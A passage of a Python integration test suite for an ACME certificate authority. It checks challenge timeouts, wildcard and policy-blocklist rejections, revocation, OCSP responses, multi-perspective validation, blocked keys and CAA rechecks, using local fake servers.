raise(Exception("Expected all redirected requests to be HTTPS"))
# TODO(@cpu): The following ServerName test will fail with config-next
# until https://github.com/letsencrypt/boulder/issues/3969 is fixed.
if CONFIG_NEXT:
return
elif r['ServerName'] != d:
raise(Exception("Expected all redirected requests to have ServerName {0} got \"{1}\"".format(d, r['ServerName'])))
class SlowHTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
try:
# Sleeptime needs to be larger than the RA->VA timeout (20s at the
# time of writing)
sleeptime = 22
print("SlowHTTPRequestHandler: sleeping for {0}s\n".format(sleeptime))
time.sleep(sleeptime)
self.send_response(200)
self.end_headers()
self.wfile.write(b"this is not an ACME key authorization")
except:
pass
class SlowHTTPServer(HTTPServer):
# Override handle_error so we don't print a misleading stack trace when the
# VA terminates the connection due to timeout.
def handle_error(self, request, client_address):
pass
def test_http_challenge_timeout():
"""
test_http_challenge_timeout tests that the VA times out challenge requests
to a slow HTTP server appropriately.
"""
# Start a simple python HTTP server on port 5002 in its own thread.
# NOTE(@cpu): The pebble-challtestsrv binds 10.77.77.77:5002 for HTTP-01
# challenges so we must use the 10.88.88.88 address for the throw away
# server for this test and add a mock DNS entry that directs the VA to it.
httpd = SlowHTTPServer(("10.88.88.88", 5002), SlowHTTPRequestHandler)
thread = threading.Thread(target = httpd.serve_forever)
thread.daemon = False
thread.start()
# Pick a random domain
hostname = random_domain()
# Add A record for the domains to ensure the VA's requests are directed
# to the interface that we bound the HTTPServer to.
challSrv.add_a_record(hostname, ["10.88.88.88"])
start = datetime.datetime.utcnow()
end = 0
try:
# We expect a connection timeout error to occur
chisel2.expect_problem("urn:ietf:params:acme:error:connection",
lambda: chisel2.auth_and_issue([hostname], chall_type="http-01"))
end = datetime.datetime.utcnow()
finally:
# Shut down the HTTP server gracefully and join on its thread.
httpd.shutdown()
httpd.server_close()
thread.join()
delta = end - start
# Expected duration should be the RA->VA timeout plus some padding (At
# present the timeout is 20s so adding 2s of padding = 22s)
expectedDuration = 22
if delta.total_seconds() == 0 or delta.total_seconds() > expectedDuration:
raise(Exception("expected timeout to occur in under {0} seconds. Took {1}".format(expectedDuration, delta.total_seconds())))
def test_tls_alpn_challenge():
# Pick two random domains
domains = [random_domain(),random_domain()]
# Add A records for these domains to ensure the VA's requests are directed
# to the interface that the challtestsrv has bound for TLS-ALPN-01 challenge
# responses
for host in domains:
challSrv.add_a_record(host, ["10.88.88.88"])
chisel2.auth_and_issue(domains, chall_type="tls-alpn-01")
for host in domains:
challSrv.remove_a_record(host)
def test_overlapping_wildcard():
"""
Test issuance for a random domain and a wildcard version of the same domain
using DNS-01. This should result in *two* distinct authorizations.
"""
domain = random_domain()
domains = [ domain, "*."+domain ]
client = chisel2.make_client(None)
csr_pem = chisel2.make_csr(domains)
order = client.new_order(csr_pem)
authzs = order.authorizations
if len(authzs) != 2:
raise(Exception("order for %s had %d authorizations, expected 2" %
(domains, len(authzs))))
cleanup = chisel2.do_dns_challenges(client, authzs)
try:
order = client.poll_and_finalize(order)
finally:
cleanup()
def test_highrisk_blocklist():
"""
Test issuance for a subdomain of a HighRiskBlockedNames entry. It should
fail with a policy error.
"""
# We include "example.org" in `test/hostname-policy.yaml` in the
# HighRiskBlockedNames list so issuing for "foo.example.org" should be
# blocked.
domain = "foo.example.org"
# We expect this to produce a policy problem
chisel2.expect_problem("urn:ietf:params:acme:error:rejectedIdentifier",
lambda: chisel2.auth_and_issue([domain], chall_type="dns-01"))
def test_wildcard_exactblacklist():
"""
Test issuance for a wildcard that would cover an exact blacklist entry. It
should fail with a policy error.
"""
# We include "highrisk.le-test.hoffman-andrews.com" in `test/hostname-policy.yaml`
# Issuing for "*.le-test.hoffman-andrews.com" should be blocked
domain = "*.le-test.hoffman-andrews.com"
# We expect this to produce a policy problem
chisel2.expect_problem("urn:ietf:params:acme:error:rejectedIdentifier",
lambda: chisel2.auth_and_issue([domain], chall_type="dns-01"))
def test_wildcard_authz_reuse():
"""
Test that an authorization for a base domain obtained via HTTP-01 isn't
reused when issuing a wildcard for that base domain later on.
"""
# Create one client to reuse across multiple issuances
client = chisel2.make_client(None)
# Pick a random domain to issue for
domains = [ random_domain() ]
csr_pem = chisel2.make_csr(domains)
# Submit an order for the name
order = client.new_order(csr_pem)
# Complete the order via an HTTP-01 challenge
cleanup = chisel2.do_http_challenges(client, order.authorizations)
try:
order = client.poll_and_finalize(order)
finally:
cleanup()
# Now try to issue a wildcard for the random domain
domains[0] = "*." + domains[0]
csr_pem = chisel2.make_csr(domains)
order = client.new_order(csr_pem)
# We expect all of the returned authorizations to be pending status
for authz in order.authorizations:
if authz.body.status != Status("pending"):
raise(Exception("order for %s included a non-pending authorization (status: %s) from a previous HTTP-01 order" %
((domains), str(authz.body.status))))
def test_bad_overlap_wildcard():
chisel2.expect_problem("urn:ietf:params:acme:error:malformed",
lambda: chisel2.auth_and_issue(["*.example.com", "www.example.com"]))
def test_duplicate_orders():
"""
Test that the same client issuing for the same domain names twice in a row
works without error.
"""
client = chisel2.make_client(None)
domains = [ random_domain() ]
chisel2.auth_and_issue(domains, client=client)
chisel2.auth_and_issue(domains, client=client)
def test_order_reuse_failed_authz():
"""
Test that creating an order for a domain name, failing an authorization in
that order, and submitting another new order request for the same name
doesn't reuse a failed authorizaton in the new order.
"""
client = chisel2.make_client(None)
domains = [ random_domain() ]
csr_pem = chisel2.make_csr(domains)
order = client.new_order(csr_pem)
firstOrderURI = order.uri
# Pick the first authz's first challenge, doesn't matter what type it is
chall_body = order.authorizations[0].body.challenges[0]
# Answer it, but with nothing set up to solve the challenge request
client.answer_challenge(chall_body, chall_body.response(client.net.key))
deadline = datetime.datetime.now() + datetime.timedelta(seconds=60)
authzFailed = False
try:
# Poll the order's authorizations until they are non-pending, a timeout
# occurs, or there is an invalid authorization status.
client.poll_authorizations(order, deadline)
except acme_errors.ValidationError as e:
# We expect there to be a ValidationError from one of the authorizations
# being invalid.
authzFailed = True
# If the poll ended and an authz's status isn't invalid then we reached the
# deadline, fail the test
if not authzFailed:
raise(Exception("timed out waiting for order %s to become invalid" % firstOrderURI))
# Make another order with the same domains
order = client.new_order(csr_pem)
# It should not be the same order as before
if order.uri == firstOrderURI:
raise(Exception("new-order for %s returned a , now-invalid, order" % domains))
# We expect all of the returned authorizations to be pending status
for authz in order.authorizations:
if authz.body.status != Status("pending"):
raise(Exception("order for %s included a non-pending authorization (status: %s) from a previous order" %
((domains), str(authz.body.status))))
# We expect the new order can be fulfilled
cleanup = chisel2.do_http_challenges(client, order.authorizations)
try:
order = client.poll_and_finalize(order)
finally:
cleanup()
def test_order_finalize_early():
"""
Test that finalizing an order before its fully authorized results in the
order having an error set and the status being invalid.
"""
# Create a client
client = chisel2.make_client(None)
# Create a random domain and a csr
domains = [ random_domain() ]
csr_pem = chisel2.make_csr(domains)
# Create an order for the domain
order = client.new_order(csr_pem)
deadline = datetime.datetime.now() + datetime.timedelta(seconds=5)
# Finalizing an order early should generate an orderNotReady error.
chisel2.expect_problem("urn:ietf:params:acme:error:orderNotReady",
lambda: client.finalize_order(order, deadline))
def test_revoke_by_account():
client = chisel2.make_client()
cert_file = temppath('test_revoke_by_account.pem')
order = chisel2.auth_and_issue([random_domain()], client=client, cert_output=cert_file.name)
cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, order.fullchain_pem)
reset_akamai_purges()
client.revoke(josepy.ComparableX509(cert), 0)
verify_ocsp(cert_file.name, "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002", "revoked")
verify_akamai_purge()
def test_revoke_by_issuer():
client = chisel2.make_client(None)
cert_file = temppath('test_revoke_by_issuer.pem')
order = chisel2.auth_and_issue([random_domain()], client=client, cert_output=cert_file.name)
cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, order.fullchain_pem)
reset_akamai_purges()
client.revoke(josepy.ComparableX509(cert), 0)
verify_ocsp(cert_file.name, "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002", "revoked")
verify_akamai_purge()
def test_revoke_by_authz():
domains = [random_domain()]
cert_file = temppath('test_revoke_by_authz.pem')
order = chisel2.auth_and_issue(domains, cert_output=cert_file.name)
cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, order.fullchain_pem)
# create a new client and re-authz
client = chisel2.make_client(None)
chisel2.auth_and_issue(domains, client=client)
reset_akamai_purges()
client.revoke(josepy.ComparableX509(cert), 0)
verify_ocsp(cert_file.name, "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002", "revoked")
verify_akamai_purge()
def test_revoke_by_privkey():
client = chisel2.make_client(None)
domains = [random_domain()]
key = OpenSSL.crypto.PKey()
key.generate_key(OpenSSL.crypto.TYPE_RSA, 2048)
key_pem = OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, key)
csr_pem = chisel2.make_csr(domains)
order = client.new_order(csr_pem)
cleanup = chisel2.do_http_challenges(client, order.authorizations)
try:
order = client.poll_and_finalize(order)
finally:
cleanup()
# Create a new client with the JWK as the cert private key
jwk = josepy.JWKRSA(key=key)
net = acme_client.ClientNetwork(key, user_agent="Boulder integration tester")
directory = Directory.from_json(net.get(chisel2.DIRECTORY_V2).json())
new_client = acme_client.ClientV2(directory, net)
cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, order.fullchain_pem)
reset_akamai_purges()
client.revoke(josepy.ComparableX509(cert), 0)
cert_file = tempfile.NamedTemporaryFile(
dir=tempdir, suffix='.test_revoke_by_privkey.pem',
mode='w+', delete=False)
cert_file.write(OpenSSL.crypto.dump_certificate(
OpenSSL.crypto.FILETYPE_PEM, cert).decode())
cert_file.close()
verify_ocsp(cert_file.name, "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002", "revoked")
verify_akamai_purge()
def test_sct_embedding():
order = chisel2.auth_and_issue([random_domain()])
print(order.fullchain_pem.encode())
cert = parse_cert(order)
# make sure there is no poison extension
try:
cert.extensions.get_extension_for_oid(x509.ObjectIdentifier("1.3.6.1.4.1.11129.2.4.3"))
raise(Exception("certificate contains CT poison extension"))
except x509.ExtensionNotFound:
# do nothing
pass
# make sure there is a SCT list extension
try:
sctList = cert.extensions.get_extension_for_oid(x509.ObjectIdentifier("1.3.6.1.4.1.11129.2.4.2"))
except x509.ExtensionNotFound:
raise(Exception("certificate doesn't contain SCT list extension"))
if len(sctList.value) != 2:
raise(Exception("SCT list contains wrong number of SCTs"))
for sct in sctList.value:
if sct.version != x509.certificate_transparency.Version.v1:
raise(Exception("SCT contains wrong version"))
if sct.entry_type != x509.certificate_transparency.LogEntryType.PRE_CERTIFICATE:
raise(Exception("SCT contains wrong entry type"))
def test_only_return_existing_reg():
client = chisel2.uninitialized_client()
email = "test@not-example.com"
client.new_account(messages.NewRegistration.from_data(email=email,
terms_of_service_agreed=True))
client = chisel2.uninitialized_client(key=client.net.key)
class extendedAcct(dict):
def json_dumps(self, indent=None):
return json.dumps(self)
acct = extendedAcct({
"termsOfServiceAgreed": True,
"contact": [email],
"onlyReturnExisting": True
})
resp = client.net.post(client.directory['newAccount'], acct, acme_version=2)
if resp.status_code != 200:
raise(Exception("incorrect response returned for onlyReturnExisting"))
other_client = chisel2.uninitialized_client()
newAcct = extendedAcct({
"termsOfServiceAgreed": True,
"contact": [email],
"onlyReturnExisting": True
})
chisel2.expect_problem("urn:ietf:params:acme:error:accountDoesNotExist",
lambda: other_client.net.post(other_client.directory['newAccount'], newAcct, acme_version=2))
def BouncerHTTPRequestHandler(redirect, guestlist):
"""
BouncerHTTPRequestHandler returns a BouncerHandler class that acts like
a club bouncer in front of another server. The bouncer will respond to
GET requests by looking up the allowed number of requests in the guestlist
for the User-Agent making the request. If there is at least one guestlist
spot for that UA it will be redirected to the real server and the
guestlist will be decremented. Once the guestlist spots for a UA are
expended requests will get a bogus result and have to stand outside in the
cold
"""
class BouncerHandler(BaseHTTPRequestHandler):
def __init__(self, *args, **kwargs):
BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def do_HEAD(self):
# This is used by wait_for_server
self.send_response(200)
self.end_headers()
def do_GET(self):
ua = self.headers['User-Agent']
guestlistAllows = BouncerHandler.guestlist.get(ua, 0)
# If there is still space on the guestlist for this UA then redirect
# the request and decrement the guestlist.
if guestlistAllows > 0:
BouncerHandler.guestlist[ua] -= 1
self.log_message("BouncerHandler UA {0} is on the Guestlist. {1} requests remaining.".format(ua, BouncerHandler.guestlist[ua]))
self.send_response(302)
self.send_header("Location", BouncerHandler.redirect)
self.end_headers()
# Otherwise return a bogus result
else:
self.log_message("BouncerHandler UA {0} has no requests on the Guestlist. Sending request to the curb".format(ua))
self.send_response(200)
self.end_headers()
self.wfile.write(u"(• ◡ •) <( VIPs only! )".encode())
BouncerHandler.guestlist = guestlist
BouncerHandler.redirect = redirect
return BouncerHandler
def wait_for_server(addr):
while True:
try:
# NOTE(@cpu): Using HEAD here instead of GET because the
# BouncerHandler modifies its state for GET requests.
status = requests.head(addr).status_code
if status == 200:
return
except requests.exceptions.ConnectionError:
pass
time.sleep(0.5)
def multiva_setup(client, guestlist):
"""
Setup a testing domain and backing multiva server setup. This will block
until the server is ready. The returned cleanup function should be used to
stop the server. The first bounceFirst requests to the server will be sent
to the real challtestsrv for a good answer, the rest will get a bad
answer. Domain name is randomly chosen with random_domain().
"""
hostname = random_domain()
csr_pem = chisel2.make_csr([hostname])
order = client.new_order(csr_pem)
authz = order.authorizations[0]
chall = None
for c in authz.body.challenges:
if isinstance(c.chall, challenges.HTTP01):
chall = c.chall
if chall is None:
raise(Exception("No HTTP-01 challenge found for random domain authz"))
token = chall.encode("token")
# Calculate the challenge's keyauth so we can add a good keyauth response on
# the real challtestsrv that we redirect VIP requests to.
resp = chall.response(client.net.key)
keyauth = resp.key_authorization
challSrv.add_http01_response(token, keyauth)
# Add an A record for the domains to ensure the VA's requests are directed
# to the interface that we bound the HTTPServer to.
challSrv.add_a_record(hostname, ["10.88.88.88"])
# Add an A record for the redirect target that sends it to the real chall
# test srv for a valid HTTP-01 response.
redirHostname = "pebble-challtestsrv.example.com"
challSrv.add_a_record(redirHostname, ["10.77.77.77"])
# Start a simple python HTTP server on port 5002 in its own thread.
# NOTE(@cpu): The pebble-challtestsrv binds 10.77.77.77:5002 for HTTP-01
# challenges so we must use the 10.88.88.88 address for the throw away
# server for this test and add a mock DNS entry that directs the VA to it.
redirect = "http://{0}/.well-known/acme-challenge/{1}".format(
redirHostname, token)
httpd = HTTPServer(("10.88.88.88", 5002), BouncerHTTPRequestHandler(redirect, guestlist))
thread = threading.Thread(target = httpd.serve_forever)
thread.daemon = False
thread.start()
def cleanup():
# Remove the challtestsrv mocks
challSrv.remove_a_record(hostname)
challSrv.remove_a_record(redirHostname)
challSrv.remove_http01_response(token)
# Shut down the HTTP server gracefully and join on its thread.
httpd.shutdown()
httpd.server_close()
thread.join()
return hostname, cleanup
def test_http_multiva_threshold_pass():
client = chisel2.make_client()
# Configure a guestlist that will pass the multiVA threshold test by
# allowing the primary VA and one remote.
guestlist = {"boulder": 1, "boulder-remote-b": 1}
hostname, cleanup = multiva_setup(client, guestlist)
try:
# With the maximum number of allowed remote VA failures the overall
# challenge should still succeed.
chisel2.auth_and_issue([hostname], client=client, chall_type="http-01")
finally:
cleanup()
def test_http_multiva_primary_fail_remote_pass():
client = chisel2.make_client()
# Configure a guestlist that will fail the primary VA check but allow the
# remote VAs
guestlist = {"boulder": 0, "boulder-remote-a": 1, "boulder-remote-b": 1}
hostname, cleanup = multiva_setup(client, guestlist)
foundException = False
try:
# The overall validation should fail even if the remotes are allowed
# because the primary VA result cannot be overridden.
chisel2.auth_and_issue([hostname], client=client, chall_type="http-01")
except acme_errors.ValidationError as e:
# NOTE(@cpu): Chisel2's expect_problem doesn't work in this case so this
# test needs to unpack an `acme_errors.ValidationError` on its own. It
# might be possible to clean this up in the future.
if len(e.failed_authzrs) != 1:
raise(Exception("expected one failed authz, found {0}".format(len(e.failed_authzrs))))
challs = e.failed_authzrs[0].body.challenges
httpChall = None
for chall_body in challs:
if isinstance(chall_body.chall, challenges.HTTP01):
httpChall = chall_body
if httpChall is None:
raise(Exception("no HTTP-01 challenge in failed authz"))
if httpChall.error.typ != "urn:ietf:params:acme:error:unauthorized":
raise(Exception("expected unauthorized prob, found {0}".format(httpChall.error.typ)))
foundException = True
finally:
cleanup()
if foundException is False:
raise(Exception("Overall validation did not fail"))
def test_http_multiva_threshold_fail():
client = chisel2.make_client()
# Configure a guestlist that will fail the multiVA threshold test by
# only allowing the primary VA.
guestlist = {"boulder": 1}
hostname, cleanup = multiva_setup(client, guestlist)
failed_authzrs = []
try:
chisel2.auth_and_issue([hostname], client=client, chall_type="http-01")
except acme_errors.ValidationError as e:
# NOTE(@cpu): Chisel2's expect_problem doesn't work in this case so this
# test needs to unpack an `acme_errors.ValidationError` on its own. It
# might be possible to clean this up in the future.
failed_authzrs = e.failed_authzrs
finally:
cleanup()
if len(failed_authzrs) != 1:
raise(Exception("expected one failed authz, found {0}".format(len(failed_authzrs))))
challs = failed_authzrs[0].body.challenges
httpChall = None
for chall_body in challs:
if isinstance(chall_body.chall, challenges.HTTP01):
httpChall = chall_body
if httpChall is None:
raise(Exception("no HTTP-01 challenge in failed authz"))
if httpChall.error.typ != "urn:ietf:params:acme:error:unauthorized":
raise(Exception("expected unauthorized prob, found {0}".format(httpChall.error.typ)))
if not httpChall.error.detail.startswith("During secondary validation: "):
raise(Exception("expected 'During secondary validation' problem detail, found {0}".format(httpChall.error.detail)))
class FakeH2ServerHandler(socketserver.BaseRequestHandler):
"""
FakeH2ServerHandler is a TCP socket handler that writes data representing an
initial HTTP/2 SETTINGS frame as a response to all received data.
"""
def handle(self):
# Read whatever the HTTP request was so that the response isn't seen as
# unsolicited.
self.data = self.request.recv(1024).strip()
# Blast some HTTP/2 bytes onto the socket
# Truncated example data from taken from the community forum:
# https://community.letsencrypt.org/t/le-validation-error-if-server-is-in-google-infrastructure/51841
self.request.sendall(b"\x00\x00\x12\x04\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x80\x00")
def wait_for_tcp_server(addr, port):
"""
wait_for_tcp_server attempts to make a TCP connection to the given
address/port every 0.5s until it succeeds.
"""
while True:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((addr, port))
sock.sendall(b"\n")
return
except socket.error:
time.sleep(0.5)
pass
def test_http2_http01_challenge():
"""
test_http2_http01_challenge tests that an HTTP-01 challenge made to a HTTP/2
server fails with a specific error message for this case.
"""
client = chisel2.make_client()
hostname = "fake.h2.example.com"
# Add an A record for the test server to ensure the VA's requests are directed
# to the interface that we bind the FakeH2ServerHandler to.
challSrv.add_a_record(hostname, ["10.88.88.88"])
# Allow socket address reuse on the base TCPServer class. Failing to do this
# causes subsequent integration tests to fail with "Address in use" errors even
# though this test _does_ call shutdown() and server_close(). Even though the
# server was shut-down Python's socket will be in TIME_WAIT because of prev. client
# connections. Having the TCPServer set SO_REUSEADDR on the socket solves
# the problem.
socketserver.TCPServer.allow_reuse_address = True
# Create, start, and wait for a fake HTTP/2 server.
server = socketserver.TCPServer(("10.88.88.88", 5002), FakeH2ServerHandler)
thread = threading.Thread(target = server.serve_forever)
thread.daemon = False
thread.start()
wait_for_tcp_server("10.88.88.88", 5002)
# Issuing an HTTP-01 challenge for this hostname should produce a connection
# problem with an error specific to the HTTP/2 misconfiguration.
expectedError = "Server is speaking HTTP/2 over HTTP"
try:
chisel2.auth_and_issue([hostname], client=client, chall_type="http-01")
except acme_errors.ValidationError as e:
for authzr in e.failed_authzrs:
c = chisel2.get_chall(authzr, challenges.HTTP01)
error = c.error
if error is None or error.typ != "urn:ietf:params:acme:error:connection":
raise(Exception("Expected connection prob, got %s" % (error.__str__())))
if not error.detail.endswith(expectedError):
raise(Exception("Expected prob detail ending in %s, got %s" % (expectedError, error.detail)))
finally:
server.shutdown()
server.server_close()
thread.join()
def test_new_order_policy_errs():
"""
Test that creating an order with policy blocked identifiers returns
a problem with subproblems.
"""
client = chisel2.make_client(None)
# 'in-addr.arpa' is present in `test/hostname-policy.yaml`'s
# HighRiskBlockedNames list.
csr_pem = chisel2.make_csr(["out-addr.in-addr.arpa", "between-addr.in-addr.arpa"])
# With two policy blocked names in the order we expect to get back a top
# level rejectedIdentifier with a detail message that references
# subproblems.
#
# TODO(@cpu): After https://github.com/certbot/certbot/issues/7046 is
# implemented in the upstream `acme` module this test should also ensure the
# subproblems are properly represented.
ok = False
try:
order = client.new_order(csr_pem)
except messages.Error as e:
ok = True
if e.typ != "urn:ietf:params:acme:error:rejectedIdentifier":
raise(Exception("Expected rejectedIdentifier type problem, got {0}".format(e.typ)))
if e.detail != 'Error creating new order :: Cannot issue for "between-addr.in-addr.arpa": The ACME server refuses to issue a certificate for this domain name, because it is forbidden by policy (and 1 more problems. Refer to sub-problems for more information.)':
raise(Exception("Order problem detail did not match expected"))
if not ok:
raise(Exception("Expected problem, got no error"))
def test_long_san_no_cn():
try:
chisel2.auth_and_issue(["".join(random.choice(string.ascii_uppercase) for x in range(61)) + ".com"])
# if we get to this raise the auth_and_issue call didn't fail, so fail the test
raise(Exception("Issuance didn't fail when the only SAN in a certificate was longer than the max CN length"))
except messages.Error as e:
if e.typ != "urn:ietf:params:acme:error:badCSR":
raise(Exception("Expected malformed type problem, got {0}".format(e.typ)))
if e.detail != "Error finalizing order :: CSR doesn't contain a SAN short enough to fit in CN":
raise(Exception("Problem detail did not match expected"))
def test_delete_unused_challenges():
order = chisel2.auth_and_issue([random_domain()], chall_type="dns-01")
a = order.authorizations[0]
if len(a.body.challenges) != 1:
raise(Exception("too many challenges (%d) left after validation" % len(a.body.challenges)))
if not isinstance(a.body.challenges[0].chall, challenges.DNS01):
raise(Exception("wrong challenge type left after validation"))
# intentionally fail a challenge
client = chisel2.make_client()
csr_pem = chisel2.make_csr([random_domain()])
order = client.new_order(csr_pem)
c = chisel2.get_chall(order.authorizations[0], challenges.DNS01)
client.answer_challenge(c, c.response(client.net.key))
for _ in range(5):
a, _ = client.poll(order.authorizations[0])
if a.body.status == Status("invalid"):
break
time.sleep(1)
if len(a.body.challenges) != 1:
raise(Exception("too many challenges (%d) left after failed validation" %
len(a.body.challenges)))
if not isinstance(a.body.challenges[0].chall, challenges.DNS01):
raise(Exception("wrong challenge type left after validation"))
def test_auth_deactivation_v2():
client = chisel2.make_client(None)
csr_pem = chisel2.make_csr([random_domain()])
order = client.new_order(csr_pem)
resp = client.deactivate_authorization(order.authorizations[0])
if resp.body.status is not messages.STATUS_DEACTIVATED:
raise(Exception("unexpected authorization status"))
order = chisel2.auth_and_issue([random_domain()], client=client)
resp = client.deactivate_authorization(order.authorizations[0])
if resp.body.status is not messages.STATUS_DEACTIVATED:
raise(Exception("unexpected authorization status"))
def test_ocsp():
cert_file = temppath('test_ocsp.pem')
chisel2.auth_and_issue([random_domain()], cert_output=cert_file.name)
# As OCSP-Updater is generating responses independently of the CA we sit in a loop
# checking OCSP until we either see a good response or we timeout (5s).
verify_ocsp(cert_file.name, "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002", "good")
def test_ct_submission():
hostname = random_domain()
# These should correspond to the configured logs in ra.json.
log_groups = [
["http://boulder:4500/submissions", "http://boulder:4501/submissions"],
["http://boulder:4510/submissions", "http://boulder:4511/submissions"],
]
def submissions(group):
count = 0
for log in group:
count += int(requests.get(log + "?hostnames=%s" % hostname).text)
return count
chisel2.auth_and_issue([hostname])
got = [ submissions(log_groups[0]), submissions(log_groups[1]) ]
expected = [ 1, 2 ]
for i in range(len(log_groups)):
if got[i] < expected[i]:
raise(Exception("For log group %d, got %d submissions, expected %d." %
(i, got[i], expected[i])))
def check_ocsp_basic_oid(cert_file, issuer_file, url):
"""
This function checks if an OCSP response was successful, but doesn't verify
the signature or timestamp. This is useful when simulating the past, so we
don't incorrectly reject a response for being in the past.
"""
ocsp_request = make_ocsp_req(cert_file, issuer_file)
responses = fetch_ocsp(ocsp_request, url)
# An unauthorized response (for instance, if the OCSP responder doesn't know
# about this cert) will just be 30 03 0A 01 06. A "good" or "revoked"
# response will contain, among other things, the id-pkix-ocsp-basic OID
# identifying the response type. We look for that OID to confirm we got a
# successful response.
expected = bytearray.fromhex("06 09 2B 06 01 05 05 07 30 01 01")
for resp in responses:
if not expected in bytearray(resp):
raise(Exception("Did not receive successful OCSP response: %s doesn't contain %s" %
(base64.b64encode(resp), base64.b64encode(expected))))
ocsp_exp_unauth_setup_data = {}
@register_six_months_ago
def ocsp_exp_unauth_setup():
client = chisel2.make_client(None)
cert_file = temppath('ocsp_exp_unauth_setup.pem')
order = chisel2.auth_and_issue([random_domain()], client=client, cert_output=cert_file.name)
cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, order.fullchain_pem)
# Since our servers are pretending to be in the past, but the openssl cli
# isn't, we'll get an expired OCSP response. Just check that it exists;
# don't do the full verification (which would fail).
check_ocsp_basic_oid(cert_file.name, "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002")
global ocsp_exp_unauth_setup_data
ocsp_exp_unauth_setup_data['cert_file'] = cert_file.name
def test_ocsp_exp_unauth():
tries = 0
if 'cert_file' not in ocsp_exp_unauth_setup_data:
raise Exception("ocsp_exp_unauth_setup didn't run")
cert_file = ocsp_exp_unauth_setup_data['cert_file']
while tries < 5:
try:
verify_ocsp(cert_file, "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002", "XXX")
raise(Exception("Unexpected return from verify_ocsp"))
except subprocess.CalledProcessError as cpe:
if cpe.output == b"Responder Error: unauthorized (6)\n":
break
except:
pass
tries += 1
time.sleep(0.25)
else:
raise(Exception("timed out waiting for unauthorized OCSP response for expired certificate"))
def test_blocked_key_account():
# Only config-next has a blocked keys file configured.
if not CONFIG_NEXT:
return
with open("test/test-ca.key", "rb") as key_file:
key = serialization.load_pem_private_key(key_file.read(), password=None, backend=default_backend())
# Create a client with the JWK set to a blocked private key
jwk = josepy.JWKRSA(key=key)
client = chisel2.uninitialized_client(jwk)
email = "test@not-example.com"
# Try to create an account
testPass = False
try:
client.new_account(messages.NewRegistration.from_data(email=email,
terms_of_service_agreed=True))
except acme_errors.Error as e:
if e.typ != "urn:ietf:params:acme:error:badPublicKey":
raise(Exception("problem did not have correct error type, had {0}".format(e.typ)))
if e.detail != "public key is forbidden":
raise(Exception("problem did not have correct error detail, had {0}".format(e.detail)))
testPass = True
if testPass is False:
raise(Exception("expected account creation to fail with Error when using blocked key"))
def test_blocked_key_cert():
# Only config-next has a blocked keys file configured.
if not CONFIG_NEXT:
return
with open("test/test-ca.key", "r") as f:
pemBytes = f.read()
domains = [random_domain(), random_domain()]
csr = acme_crypto_util.make_csr(pemBytes, domains, False)
client = chisel2.make_client(None)
order = client.new_order(csr)
authzs = order.authorizations
testPass = False
cleanup = chisel2.do_http_challenges(client, authzs)
try:
order = client.poll_and_finalize(order)
except acme_errors.Error as e:
if e.typ != "urn:ietf:params:acme:error:badCSR":
raise(Exception("problem did not have correct error type, had {0}".format(e.typ)))
if e.detail != "Error finalizing order :: invalid public key in CSR: public key is forbidden":
raise(Exception("problem did not have correct error detail, had {0}".format(e.detail)))
testPass = True
if testPass is False:
raise(Exception("expected cert creation to fail with Error when using blocked key"))
def test_expiration_mailer():
email_addr = "integration.%x@letsencrypt.org" % random.randrange(2**16)
order = chisel2.auth_and_issue([random_domain()], email=email_addr)
cert = parse_cert(order)
# Check that the expiration mailer sends a reminder
expiry = cert.not_valid_after
no_reminder = expiry + datetime.timedelta(days=-31)
first_reminder = expiry + datetime.timedelta(days=-13)
last_reminder = expiry + datetime.timedelta(days=-2)
requests.post("http://localhost:9381/clear", data='')
for time in (no_reminder, first_reminder, last_reminder):
print(get_future_output(
["./bin/expiration-mailer", "--config", "%s/expiration-mailer.json" % config_dir],
time))
resp = requests.get("http://localhost:9381/count?to=%s" % email_addr)
mailcount = int(resp.text)
if mailcount != 2:
raise(Exception("\nExpiry mailer failed: expected 2 emails, got %d" % mailcount))
caa_recheck_setup_data = {}
@register_twenty_days_ago
def caa_recheck_setup():
client = chisel2.make_client()
# Issue a certificate with the clock set back, and save the authzs to check
# later that they are valid (200). They should however require rechecking for
# CAA purposes.
numNames = 10
# Generate numNames subdomains of a random domain
base_domain = random_domain()
domains = [ "{0}.{1}".format(str(n),base_domain) for n in range(numNames) ]
order = chisel2.auth_and_issue(domains, client=client)
global caa_recheck_setup_data
caa_recheck_setup_data = {
'client': client,
'authzs': order.authorizations,
}
def test_recheck_caa():
"""Request issuance for a domain where we have a old cached authz from when CAA
was good. We'll set a new CAA record forbidding issuance; the CAA should
recheck CAA and reject the request.
"""
if 'authzs' not in caa_recheck_setup_data:
raise(Exception("CAA authzs not prepared for test_caa"))
domains = []
for a in caa_recheck_setup_data['authzs']:
response = caa_recheck_setup_data['client']._post(a.uri, None)
if response.status_code != 200:
raise(Exception("Unexpected response for CAA authz: ",
response.status_code))
domain = a.body.identifier.value
domains.append(domain)
# Set a forbidding CAA record on just one domain
challSrv.add_caa_issue(domains[3], ";")
# Request issuance for the previously-issued domain name, which should
# now be denied due to CAA.
chisel2.expect_problem("urn:ietf:params:acme:error:caa",
lambda: chisel2.auth_and_issue(domains, client=caa_recheck_setup_data['client']))
def test_caa_good():
domain = random_domain()
challSrv.add_caa_issue(domain, "happy-hacker-ca.invalid")
chisel2.auth_and_issue([domain])
def test_caa_reject():
domain = random_domain()
challSrv.add_caa_issue(domain, "sad-hacker-ca.invalid")
chisel2.expect_problem("urn:ietf:params:acme:error:caa",
lambda: chisel2.auth_and_issue([domain]))
def test_caa_extensions():
goodCAA = "happy-hacker-ca.invalid"
